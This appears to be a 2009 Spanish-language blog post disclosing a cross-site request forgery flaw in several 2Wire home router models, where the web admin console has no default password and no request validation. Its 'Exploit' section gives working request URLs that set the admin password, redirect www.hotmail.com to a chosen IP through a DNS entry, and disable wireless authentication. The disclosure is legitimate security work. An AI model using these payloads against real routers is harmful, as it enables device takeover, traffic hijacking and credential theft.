Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida
http://www.2wire.com fue Notificado
I. Información
-------------
Son los ruteadores más populares de México y su
consola de administración web no
tiene password por defecto.
II. Vulnerabilidad
----------------
Es posible hacer que el cliente realice una petición al
ruteador y modifique
cualquier configuración.
No valida POST ni Referer ni nada.
III. "Exploit"
--------
Solo necesitamos hacer que el cliente realice alguna petición
con la configuración
que queramos.
[ejemplos]
Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_
POST&THISPAGE=A05&NEXTPAGE=A05_
POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_
CONF=NUEVOPASS
Agregar un registro DNS (74.125.19.99 www.hotmail.com):
http://192.168.1.254/xslt?PAGE=J38_
SET&THISPAGE=J38&NEXTPAGE=J38_
SET&NAME=www.hotmail.com&ADDR=74.125.19.99
Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_
POST&THISPAGE=C05&NEXTPAGE=C05_
POST&NAME=encrypt_enabled&VALUE=0
miércoles, 4 de marzo de 2009
Vulnerabilidades en ruteadores 2Wire (algunas versiones)
Routers Vulnerables: 1701HG, 1800HW, 2071 Gateway
Suscribirse a:
Enviar comentarios (Atom)
No hay comentarios:
Publicar un comentario